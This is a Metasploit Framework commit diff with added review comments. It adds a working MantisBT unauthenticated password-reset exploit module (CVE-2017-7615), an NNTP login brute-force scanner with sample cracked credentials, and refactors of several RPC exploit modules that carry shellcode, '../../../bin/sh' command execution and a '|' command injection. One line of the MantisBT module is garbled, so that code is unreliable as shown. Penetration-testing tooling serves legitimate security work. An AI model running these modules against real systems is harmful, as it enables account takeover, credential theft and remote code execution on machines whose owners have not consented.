diff --git a/Gemfile.lock b/Gemfile.lock
index 6da285dbd2..68976ee3b4 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -1,7 +1,7 @@
PATH
remote: .
specs:
- metasploit-framework (4.15.0)
+ metasploit-framework (4.15.1)
actionpack (~> 4.2.6)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
diff --git a/documentation/modules/auxiliary/admin/http/mantisbt_password_reset.md b/documentation/modules/auxiliary/admin/http/mantisbt_password_reset.md
new file mode 100644
index 0000000000..92d8f908e3
--- /dev/null
+++ b/documentation/modules/auxiliary/admin/http/mantisbt_password_reset.md
@@ -0,0 +1,30 @@
+## Vulnerable Application
+
+MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded
+on
+[Sourceforge](https://sourceforge.net/projects/mantisbt/files/mantis-stable/).
+
+## Verification Steps
+
+ 1. Install the vulnerable software
+ 2. Start msfconsole
+ 3. Do: ```use auxiliary/admin/http/mantisbt_password_reset```
+ 4. Do: ```set rhost```
+ 5. Do: ```run```
+ 6. If the system is vulnerable, the module should tell you that the password
+ was successfully changed.
+
+## Scenarios
+
+ ```
+ msf > use auxiliary/admin/http/mantisbt_password_reset
+ msf auxiliary(mantisbt_password_reset) > set rport 8082
+ rport => 8082
+ msf auxiliary(mantisbt_password_reset) > set rhost 127.0.0.1
+ rhost => 127.0.0.1
+ msf auxiliary(mantisbt_password_reset) > run
+
+ [+] Password successfully changed to 'ndOQTmhQ'.
+ [*] Auxiliary module execution completed
+ msf auxiliary(mantisbt_password_reset) >
+ ```
diff --git a/documentation/modules/auxiliary/scanner/nntp/nntp_login.md b/documentation/modules/auxiliary/scanner/nntp/nntp_login.md
new file mode 100644
index 0000000000..dbeda3730c
--- /dev/null
+++ b/documentation/modules/auxiliary/scanner/nntp/nntp_login.md
@@ -0,0 +1,42 @@
+## Description
+
+ This module attempts to authenticate to NNTP services which support the AUTHINFO authentication extension.
+
+ This module supports AUTHINFO USER/PASS authentication, but does not support AUTHINFO GENERIC or AUTHINFO SASL authentication methods.
+
+ If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
+
+
+## Vulnerable Application
+
+ This module has been tested successfully on:
+
+ * [SurgeNews](http://netwinsite.com/surgenews/) on Windows 7 SP 1.
+ * [SurgeNews](http://netwinsite.com/surgenews/) on Ubuntu Linux.
+ * [INN2](https://www.eyrie.org/~eagle/faqs/inn.html) on Debian Linux.
+
+
+## Verification Steps
+
+ 1. Do: `use auxiliary/scanner/nntp/nntp_login`
+ 2. Do: `set RHOSTS [IP]`
+ 3. Do: `set RPORT [IP]`
+ 4. Do: `run`
+
+
+## Scenarios
+
+ ```
+ msf auxiliary(nntp_login) > run
+
+ [+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'asdf' : 'asdf'
+ [+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'zxcv' : 'zxcv'
+ [+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'test' : 'test'
+ [*] Scanned 1 of 2 hosts (50% complete)
+ [+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'asdf' : 'asdf'
+ [+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'admin' : 'admin'
+ [+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'user' : 'pass'
+ [*] Scanned 2 of 2 hosts (100% complete)
+ [*] Auxiliary module execution completed
+ ```
+
diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb
index 6a755e1d7e..ad726fc009 100644
--- a/lib/metasploit/framework/version.rb
+++ b/lib/metasploit/framework/version.rb
@@ -30,7 +30,7 @@ module Metasploit
end
end
- VERSION = "4.15.0"
+ VERSION = "4.15.1"
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
PRERELEASE = 'dev'
HASH = get_hash
diff --git a/lib/msf/core/exploit/sunrpc.rb b/lib/msf/core/exploit/sunrpc.rb
index 265bea4ac5..92e9af2293 100644
--- a/lib/msf/core/exploit/sunrpc.rb
+++ b/lib/msf/core/exploit/sunrpc.rb
@@ -16,8 +16,6 @@ module Msf
module Exploit::Remote::SunRPC
include Exploit::Remote::Tcp
- XDR = Rex::Encoder::XDR
-
MSG_ACCEPTED = 0
SUCCESS = 0 # RPC executed successfully
PROG_UMAVAIL = 1 # Remote hasn't exported program
@@ -72,7 +70,7 @@ module Exploit::Remote::SunRPC
ret = rpcobj.create
raise ::Rex::Proto::SunRPC::RPCError, "#{rhost}:#{rport} - SunRPC - No response to Portmap request" unless ret
- arr = XDR.decode!(ret, Integer, Integer, Integer, String, Integer, Integer)
+ arr = Rex::Encoder::XDR.decode!(ret, Integer, Integer, Integer, String, Integer, Integer)
if arr[1] != MSG_ACCEPTED || arr[4] != SUCCESS || arr[5] == 0
err = "#{rhost}:#{rport} - SunRPC - Portmap request failed: "
err << 'Message not accepted' if arr[1] != MSG_ACCEPTED
diff --git a/lib/msf/ui/console/command_dispatcher/resource.rb b/lib/msf/ui/console/command_dispatcher/resource.rb
index 846089c64d..b020bd743f 100644
--- a/lib/msf/ui/console/command_dispatcher/resource.rb
+++ b/lib/msf/ui/console/command_dispatcher/resource.rb
@@ -37,8 +37,8 @@ module Msf
def cmd_resource_help
print_line "Usage: resource path1 [path2 ...]"
print_line
- print_line "Run the commands stored in the supplied files. Resource files may also contain"
- print_line "ruby code between tags."
+ print_line "Run the commands stored in the supplied files (- for stdin)."
+ print_line "Resource files may also contain ERB or Ruby code between tags."
print_line
print_line "See also: makerc"
print_line
@@ -52,21 +52,23 @@ module Msf
args.each do |res|
good_res = nil
- if ::File.exist?(res)
+ if res == '-'
+ good_res = res
+ elsif ::File.exist?(res)
good_res = res
elsif
# let's check to see if it's in the scripts/resource dir (like when tab completed)
- [
- ::Msf::Config.script_directory + ::File::SEPARATOR + "resource",
- ::Msf::Config.user_script_directory + ::File::SEPARATOR + "resource"
- ].each do |dir|
- res_path = dir + ::File::SEPARATOR + res
- if ::File.exist?(res_path)
- good_res = res_path
- break
+ [
+ ::Msf::Config.script_directory + ::File::SEPARATOR + "resource",
+ ::Msf::Config.user_script_directory + ::File::SEPARATOR + "resource"
+ ].each do |dir|
+ res_path = dir + ::File::SEPARATOR + res
+ if ::File.exist?(res_path)
+ good_res = res_path
+ break
+ end
end
end
- end
if good_res
driver.load_resource(good_res)
else
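Review bot: The bare `elsif` kept on the new side has no condition of its own, so Ruby appears to parse the following `[...].each do |dir| ... end` expression as its condition and the branch body stays empty. The fallback lookup therefore works only as a side effect of evaluating that condition. Writing it as `else` makes the search of the two `resource` directories an ordinary branch and removes the reliance on what `each` and `break` return. Because `res` is appended to those directories unchanged, a comment such as `# res is operator-supplied and may contain path separators` would document that the lookup is not confined to them. The enclosing method starts and ends outside this hunk.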
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb
index 5ec16f86fc..72ab8bfa71 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb
@@ -373,7 +373,7 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
end
# Keep transferring until EOF is reached...
- block_size = opts['block_size'] || 1024 * 1024
+ block_size = (opts && opts['block_size']) || 1024 * 1024
begin
if tries
# resume when timeouts encountered
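Review bot: The nil guard on `opts` covers only this one lookup, so any other `opts[...]` read in the method (not visible in this hunk) would still raise `NoMethodError` when a caller passes `nil`. Normalising once near the top with `opts ||= {}` would keep the original `opts['block_size'] || 1024 * 1024` and protect every later access. `block_size` is then used as supplied; if callers can pass arbitrary values, a check that it is a positive Integer would be worth adding before the transfer loop. The method body starts and ends outside the hunk.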
diff --git a/modules/auxiliary/admin/http/mantisbt_password_reset.rb b/modules/auxiliary/admin/http/mantisbt_password_reset.rb
new file mode 100644
index 0000000000..b07ab2b064
--- /dev/null
+++ b/modules/auxiliary/admin/http/mantisbt_password_reset.rb
@@ -0,0 +1,113 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+## Current source: https://github.com/rapid7/metasploit-framework
+###
+
+class MetasploitModule < Msf::Auxiliary
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "MantisBT password reset",
+ 'Description' => %q{
+ MantisBT before 1.3.10, 2.2.4, and 2.3.1 are vulnerable to unauthenticated password reset.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'John (hyp3rlinx) Page', # initial discovery
+ 'Julien (jvoisin) Voisin' # metasploit module
+ ],
+ 'References' =>
+ [
+ ['CVE', '2017-7615'],
+ ['EDB', '41890'],
+ ['URL', 'https://mantisbt.org/bugs/view.php?id=22690'],
+ ['URL', 'http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt']
+ ],
+ 'Platform' => ['win', 'linux'],
+ 'DisclosureDate' => "Apr 16 2017"))
+
+ register_options(
+ [
+ OptString.new('USERID', [ true, 'User id to reset', 1]),
+ OptString.new('PASSWORD', [ false, 'The new password to set (blank for random)', '']),
+ OptString.new('TARGETURI', [ true, 'Relative URI of MantisBT installation', '/'])
+ ]
+ )
+ end
+
+ def check
+ begin
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, '/login_page.php'),
+ 'method'=>'GET'
+ })
+
+ if res && res.body && res.body.include?('Powered by MantisBT')
+ vprint_status("MantisBT detected")
+ return Exploit::CheckCode::Detected
+ else
+ vprint_status("Not a MantisBT Instance!")
+ return Exploit::CheckCode::Safe
+ end
+
+ rescue Rex::ConnectionRefused
+ print_error("Connection refused by server.")
+ return Exploit::CheckCode::Safe
+ end
+ end
+
+ def run
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, '/verify.php'),
+ 'method' => 'GET',
+ 'vars_get' => {
+ 'id' => datastore['USERID'],
+ 'confirm_hash' => ''
+ }
+ })
+
+ if !res || !res.body
+ fail_with(Failure::UnexpectedReply, "Error in server response. Ensure the server IP is correct.")
+ end
+
+ cookie = res.get_cookies
+
+ if cookie == '' || !(res.body.include? 'Your account information has been verified.')
+ fail_with(Failure::NoAccess, "Authentication failed")
+ end
+
+
+ if datastore['PASSWORD'].blank?
+ password = Rex::Text.rand_text_alpha(8)
+ else
+ password = datastore['PASSWORD']
+ end
+
+ if res.body =~ / normalize_uri(target_uri.path, '/account_update.php'),
+ 'method' => 'POST',
+ 'vars_post' => {
+ 'verify_user_id' => datastore['USERID'],
+ 'account_update_token' => $1,
+ 'realname' => Rex::Text.rand_text_alpha(rand(5) + 8),
+ 'password' => password,
+ 'password_confirm' => password
+ },
+ 'cookie' => cookie
+ })
+
+ if res && res.body && res.body.include?('Password successfully updated')
+ print_good("Password successfully changed to '#{password}'.")
+ else
+ fail_with(Failure::UnexpectedReply, 'Something went wrong, the password was not changed.')
+ end
+ end
+end
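Review bot: `check` returns `Exploit::CheckCode::Safe` both in the `rescue Rex::ConnectionRefused` branch and when `send_request_cgi` yields no response, although in neither case was the target actually examined. An assessment report built on that result would list an unreachable host as not vulnerable. Return `Exploit::CheckCode::Unknown` from the rescue branch and add `return Exploit::CheckCode::Unknown unless res` before the body test. In `run`, the token-extraction line (`if res.body =~ ...`) is garbled on this page, so it is unclear whether a failure path exists when the token pattern does not match; if there is none, a `fail_with(Failure::UnexpectedReply, ...)` in an `else` would keep the module from ending silently.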
diff --git a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb
index 0f374193d0..f7cd207316 100644
--- a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb
+++ b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb
@@ -66,14 +66,14 @@ class MetasploitModule < Msf::Auxiliary
# Prepare the traversing request for kcms_server
trav = 'TT_DB/' + ('../' * 5) + path
- buf = XDR.encode(
+ buf = Rex::Encoder::XDR.encode(
[trav, 1024],
0, # O_RDONLY
0755) # mode
# Make the request
ret = sunrpc_call(1003, buf)
- ack, fsize, fd = XDR.decode!(ret, Integer, Integer, Integer)
+ ack, fsize, fd = Rex::Encoder::XDR.decode!(ret, Integer, Integer, Integer)
if (ack != 0)
print_error("KCMS open() failed (ack: 0x%x != 0)" % ack)
@@ -88,13 +88,13 @@ class MetasploitModule < Msf::Auxiliary
print_status("fd: #{fd}, file size #{fsize}")
print_status("Making read() request to the kcms_server...")
- buf = XDR.encode(
+ buf = Rex::Encoder::XDR.encode(
fd,
0,
fsize)
ret = sunrpc_call(1005, buf)
- x, data = XDR.decode!(ret, Integer, [Integer])
+ x, data = Rex::Encoder::XDR.decode!(ret, Integer, [Integer])
# If we got something back...
if (data)
@@ -118,7 +118,7 @@ class MetasploitModule < Msf::Auxiliary
# Close it regardless if it returned anything..
print_status("Making close() request to the kcms_server...")
- buf = XDR.encode(fd)
+ buf = Rex::Encoder::XDR.encode(fd)
sunrpc_call(1004, buf)
# done
@@ -138,7 +138,7 @@ class MetasploitModule < Msf::Auxiliary
def ttdb_build(path)
sunrpc_create('tcp', 100083, 1)
sunrpc_authunix('localhost', 0, 0, [])
- msg = XDR.encode(
+ msg = Rex::Encoder::XDR.encode(
[path, 1024],
path.length,
1, # KEY (VArray head?)
@@ -152,7 +152,7 @@ class MetasploitModule < Msf::Auxiliary
0x10002,
path.length)
ret = sunrpc_call(3, msg)
- arr = XDR.decode!(ret, Integer, Integer)
+ arr = Rex::Encoder::XDR.decode!(ret, Integer, Integer)
print_status("TTDB reply: 0x%x, %d" % arr)
sunrpc_destroy
end
diff --git a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb
index b33bef9a61..36ed87f52c 100644
--- a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb
+++ b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb
@@ -40,8 +40,8 @@ class MetasploitModule < Msf::Auxiliary
progs = resp[3, 1].unpack('C')[0]
maps = []
if (progs == 0x01)
- while XDR.decode_int!(resp) == 1
- maps << XDR.decode!(resp, Integer, Integer, Integer, Integer)
+ while Rex::Encoder::XDR.decode_int!(resp) == 1
+ maps << Rex::Encoder::XDR.decode!(resp, Integer, Integer, Integer, Integer)
end
end
sunrpc_destroy
diff --git a/modules/auxiliary/scanner/nfs/nfsmount.rb b/modules/auxiliary/scanner/nfs/nfsmount.rb
index 10a0c07517..aa61c9a9af 100644
--- a/modules/auxiliary/scanner/nfs/nfsmount.rb
+++ b/modules/auxiliary/scanner/nfs/nfsmount.rb
@@ -56,11 +56,11 @@ class MetasploitModule < Msf::Auxiliary
exports = resp[3,1].unpack('C')[0]
if (exports == 0x01)
shares = []
- while XDR.decode_int!(resp) == 1 do
- dir = XDR.decode_string!(resp)
+ while Rex::Encoder::XDR.decode_int!(resp) == 1 do
+ dir = Rex::Encoder::XDR.decode_string!(resp)
grp = []
- while XDR.decode_int!(resp) == 1 do
- grp << XDR.decode_string!(resp)
+ while Rex::Encoder::XDR.decode_int!(resp) == 1 do
+ grp << Rex::Encoder::XDR.decode_string!(resp)
end
print_good("#{ip} NFS Export: #{dir} [#{grp.join(", ")}]")
shares << [dir, grp]
diff --git a/modules/auxiliary/scanner/nntp/nntp_login.rb b/modules/auxiliary/scanner/nntp/nntp_login.rb
new file mode 100644
index 0000000000..aeed297540
--- /dev/null
+++ b/modules/auxiliary/scanner/nntp/nntp_login.rb
@@ -0,0 +1,189 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::AuthBrute
+ include Msf::Auxiliary::Scanner
+ include Msf::Exploit::Remote::Tcp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'NNTP Login Utility',
+ 'Description' => %q{
+ This module attempts to authenticate to NNTP services
+ which support the AUTHINFO authentication extension.
+
+ This module supports AUTHINFO USER/PASS authentication,
+ but does not support AUTHINFO GENERIC or AUTHINFO SASL
+ authentication methods.
+ },
+ 'Author' => 'Brendan Coles ',
+ 'License' => MSF_LICENSE,
+ 'References' => [ [ 'CVE', '1999-0502' ], # Weak password
+ [ 'URL', 'https://tools.ietf.org/html/rfc3977' ],
+ [ 'URL', 'https://tools.ietf.org/html/rfc4642' ],
+ [ 'URL', 'https://tools.ietf.org/html/rfc4643' ] ]))
+ register_options(
+ [
+ Opt::RPORT(119),
+ OptPath.new('USER_FILE', [ false, 'The file that contains a list of probable usernames.',
+ File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_users.txt') ]),
+ OptPath.new('PASS_FILE', [ false, 'The file that contains a list of probable passwords.',
+ File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt') ])
+ ])
+ deregister_options 'RHOST'
+ end
+
+ def run_host(ip)
+ begin
+ connect
+ return :abort unless nntp?
+ return :abort unless supports_authinfo?
+
+ report_service :host => rhost,
+ :port => rport,
+ :proto => 'tcp',
+ :name => 'nntp'
+ disconnect
+
+ each_user_pass { |user, pass| do_login user, pass }
+ rescue ::Interrupt
+ raise $ERROR_INFO
+ rescue EOFError, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ print_error "#{peer} Connection failed"
+ return
+ rescue OpenSSL::SSL::SSLError => e
+ print_error "SSL negotiation failed: #{e}"
+ rescue => e
+ print_error "#{peer} Error: #{e.class} #{e} #{e.backtrace}"
+ return
+ ensure
+ disconnect
+ end
+ end
+
+ def nntp?
+ banner = sock.get_once
+
+ if !banner
+ vprint_error "#{peer} No response"
+ return false
+ end
+
+ if banner !~ /^200/
+ print_error 'Unexpected reply'
+ return false
+ end
+
+ vprint_status 'Server is a NTTP server'
+ vprint_status "Banner: #{banner}"
+ true
+ end
+
+ def supports_authinfo?
+ sock.put "HELP\r\n"
+ res = sock.get(-1)
+ code = res.scan(/\A(\d+)\s/).flatten.first.to_i
+
+ if code.nil?
+ print_error 'Server is not a NNTP server'
+ return false
+ end
+
+ if code == 480
+ vprint_warning 'Authentication is required before listing authentication capabilities.'
+ return true
+ end
+
+ if code == 100 && res =~ /authinfo/i
+ vprint_status 'Server supports AUTHINFO'
+ return true
+ end
+
+ print_error 'Server does not support AUTHINFO'
+ false
+ end
+
+ def do_login(user, pass)
+ vprint_status "Trying username:'#{user}' with password:'#{pass}'"
+
+ begin
+ connect
+ sock.get_once
+
+ sock.put "AUTHINFO USER #{user}\r\n"
+ res = sock.get_once
+ unless res
+ vprint_error "#{peer} No response"
+ return :abort
+ end
+
+ code = res.scan(/\A(\d+)\s/).flatten.first.to_i
+ if code != 381
+ vprint_error "#{peer} Unexpected reply. Skipping user..."
+ return :skip_user
+ end
+
+ sock.put "AUTHINFO PASS #{pass}\r\n"
+ res = sock.get_once
+ unless res
+ vprint_error "#{peer} No response"
+ return :abort
+ end
+
+ code = res.scan(/\A(\d+)\s/).flatten.first.to_i
+ if code == 452 || code == 481
+ vprint_error "#{peer} Login failed"
+ return
+ elsif code == 281
+ print_good "#{peer} Successful login with: '#{user}' : '#{pass}'"
+ report_cred ip: rhost,
+ port: rport,
+ service_name: 'nntp',
+ user: user,
+ password: pass,
+ proof: code.to_s
+ return :next_user
+ else
+ vprint_error "#{peer} Failed login as: '#{user}' - Unexpected reply: #{res.inspect}"
+ return
+ end
+ rescue EOFError, ::Rex::ConnectionError, ::Errno::ECONNREFUSED, ::Errno::ETIMEDOUT
+ print_error 'Connection failed'
+ return
+ rescue OpenSSL::SSL::SSLError => e
+ print_error "SSL negotiation failed: #{e}"
+ return :abort
+ end
+ rescue => e
+ print_error "Error: #{e}"
+ return nil
+ ensure
+ disconnect
+ end
+
+ def report_cred(opts)
+ service_data = { address: opts[:ip],
+ port: opts[:port],
+ service_name: opts[:service_name],
+ protocol: 'tcp',
+ workspace_id: myworkspace_id }
+
+ credential_data = { origin_type: :service,
+ module_fullname: fullname,
+ username: opts[:user],
+ private_data: opts[:password],
+ private_type: :password }.merge service_data
+
+ login_data = { last_attempted_at: DateTime.now,
+ core: create_credential(credential_data),
+ status: Metasploit::Model::Login::Status::SUCCESSFUL,
+ proof: opts[:proof] }.merge service_data
+
+ create_credential_login login_data
+ end
+end
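Review bot: In `supports_authinfo?` the `code.nil?` test can never be true, because `code` is built with `.first.to_i` and `nil.to_i` is 0, so the 'Server is not a NNTP server' branch is dead code. The result of `sock.get(-1)` is also used without a nil check, so if it can return nil the `res.scan` call raises `NoMethodError` instead of reporting a clean failure. Add `return false unless res` after the read and test `code.zero?` in place of `code.nil?`. In `run_host`, `raise $ERROR_INFO` depends on the `English` library having been loaded elsewhere; a bare `raise` re-raises the current exception without that dependency. The status string 'Server is a NTTP server' in `nntp?` looks like a typo for NNTP.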
diff --git a/modules/exploits/aix/rpc_cmsd_opcode21.rb b/modules/exploits/aix/rpc_cmsd_opcode21.rb
index f974f5ee56..48e951c0f6 100644
--- a/modules/exploits/aix/rpc_cmsd_opcode21.rb
+++ b/modules/exploits/aix/rpc_cmsd_opcode21.rb
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
# spray the heap a bit (work around powerpc cache issues)
buf = make_nops(1024 - @aixpayload.length)
buf << @aixpayload
- xdr = XDR.encode(buf, buf)
+ xdr = Rex::Encoder::XDR.encode(buf, buf)
10.times {
sunrpc_call(7, xdr, 2)
}
@@ -93,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
buf = rand_text_alphanumeric(payload_space)
buf << [brute_target['Ret']].pack('N')
- xdr = XDR.encode(buf, "")
+ xdr = Rex::Encoder::XDR.encode(buf, "")
sunrpc_authunix('localhost', 0, 0, [])
sunrpc_call(21, xdr, 2)
diff --git a/modules/exploits/aix/rpc_ttdbserverd_realpath.rb b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb
index 27a6b75d66..32db2e25d3 100644
--- a/modules/exploits/aix/rpc_ttdbserverd_realpath.rb
+++ b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb
@@ -262,7 +262,7 @@ class MetasploitModule < Msf::Exploit::Remote
buf << "\x7f\xff\xfb\x78" * 1920
buf << @aixpayload
- buf = XDR.encode(buf, 2, 0x78000000, 2, 0x78000000)
+ buf = Rex::Encoder::XDR.encode(buf, 2, 0x78000000, 2, 0x78000000)
print_status('Sending procedure 15 call message...')
sunrpc_call(15, buf)
diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb
index b9e31e6c39..10ba07a5e9 100644
--- a/modules/exploits/multi/http/php_cgi_arg_injection.rb
+++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb
@@ -114,7 +114,6 @@ class MetasploitModule < Msf::Exploit::Remote
create_arg("-d","auto_prepend_file=php://input"),
create_arg("-d", "cgi.force_redirect=#{rand_php_ini_false}"),
create_arg("-d", "cgi.redirect_status_env=0"),
- create_arg("-d", "suhosin.simulation=#{rand_php_ini_true}"),
rand_opt_equiv("-n")
]
diff --git a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb
index 5e369c2206..5dc5a137c4 100644
--- a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb
+++ b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb
@@ -121,8 +121,8 @@ class MetasploitModule < Msf::Exploit::Remote
buf2 = @nops + payload.encoded
header =
- XDR.encode(0) * 7 +
- XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,
+ Rex::Encoder::XDR.encode(0) * 7 +
+ Rex::Encoder::XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,
4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0,
hostname, 'system', rand_text_alpha(16))
@@ -139,9 +139,9 @@ class MetasploitModule < Msf::Exploit::Remote
do_string('ADM_TIMEOUT_PARMS', 'TTL=0 PTO=20 PCNT=2 PDLY=30') +
do_int('ADM_FENCE', 0) +
do_string('X', buf2) +
- XDR.encode('netmgt_endofargs')
+ Rex::Encoder::XDR.encode('netmgt_endofargs')
- request = header + XDR.encode(header.length + body.length - 326) + body
+ request = header + Rex::Encoder::XDR.encode(header.length + body.length - 326) + body
begin
# two seconds timeout for brute force
@@ -157,11 +157,11 @@ class MetasploitModule < Msf::Exploit::Remote
end
def do_string(str1, str2)
- XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)
+ Rex::Encoder::XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)
end
def do_int(str, int)
- XDR.encode(str, 3, 4, int, 0, 0)
+ Rex::Encoder::XDR.encode(str, 3, 4, int, 0, 0)
end
end
diff --git a/modules/exploits/solaris/sunrpc/sadmind_exec.rb b/modules/exploits/solaris/sunrpc/sadmind_exec.rb
index 496aec53db..2ee5b3fcbe 100644
--- a/modules/exploits/solaris/sunrpc/sadmind_exec.rb
+++ b/modules/exploits/solaris/sunrpc/sadmind_exec.rb
@@ -97,8 +97,8 @@ class MetasploitModule < Msf::Exploit::Remote
def sadmind_request(host, command)
header =
- XDR.encode(0) * 7 +
- XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,
+ Rex::Encoder::XDR.encode(0) * 7 +
+ Rex::Encoder::XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,
4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0,
host, 'system', '../../../bin/sh')
@@ -116,19 +116,19 @@ class MetasploitModule < Msf::Exploit::Remote
do_int('ADM_FENCE', 0) +
do_string('X', '-c') +
do_string('Y', command) +
- XDR.encode('netmgt_endofargs')
+ Rex::Encoder::XDR.encode('netmgt_endofargs')
- request = header + XDR.encode(header.length + body.length - 326) + body
+ request = header + Rex::Encoder::XDR.encode(header.length + body.length - 326) + body
ret = sunrpc_call(1, request)
- return XDR.decode!(ret, Integer, Integer, String)[2]
+ return Rex::Encoder::XDR.decode!(ret, Integer, Integer, String)[2]
end
def do_string(str1, str2)
- XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)
+ Rex::Encoder::XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)
end
def do_int(str, int)
- XDR.encode(str, 3, 4, int, 0, 0)
+ Rex::Encoder::XDR.encode(str, 3, 4, int, 0, 0)
end
end
diff --git a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb
index d0d50126d8..d8181c4bc3 100644
--- a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb
+++ b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb
@@ -69,7 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote
print_status('Waiting for response...')
sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
command = '|' + payload.encoded
- msg = XDR.encode(command, 2, 0x78000000, 2, 0x78000000)
+ msg = Rex::Encoder::XDR.encode(command, 2, 0x78000000, 2, 0x78000000)
sunrpc_call(procedure, msg)
sunrpc_destroy
diff --git a/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb b/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb
index dbe5adb009..10b500d7d4 100644
--- a/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb
+++ b/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb
@@ -262,7 +262,7 @@ class MetasploitModule < Msf::Exploit::Remote
data = "_" + data + "_1_1_1_1_1_1_1_1_1"
- request = XDR.encode(1, 1, 2, 2, 2, data, 3, 3)
+ request = Rex::Encoder::XDR.encode(1, 1, 2, 2, 2, data, 3, 3)
print_status("Trying target #{target.name}...")
diff --git a/modules/exploits/windows/emc/networker_format_string.rb b/modules/exploits/windows/emc/networker_format_string.rb
index b5fee3a390..0346154aff 100644
--- a/modules/exploits/windows/emc/networker_format_string.rb
+++ b/modules/exploits/windows/emc/networker_format_string.rb
@@ -108,7 +108,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
fs << payload.encoded
- xdr = XDR.encode(0, 2, rand_text_alpha(10), XDR.encode(fs, rand_text_alpha(10)), 2)
+ xdr = Rex::Encoder::XDR.encode(0, 2, rand_text_alpha(10), Rex::Encoder::XDR.encode(fs, rand_text_alpha(10)), 2)
sunrpc_call(6, xdr)
sunrpc_destroy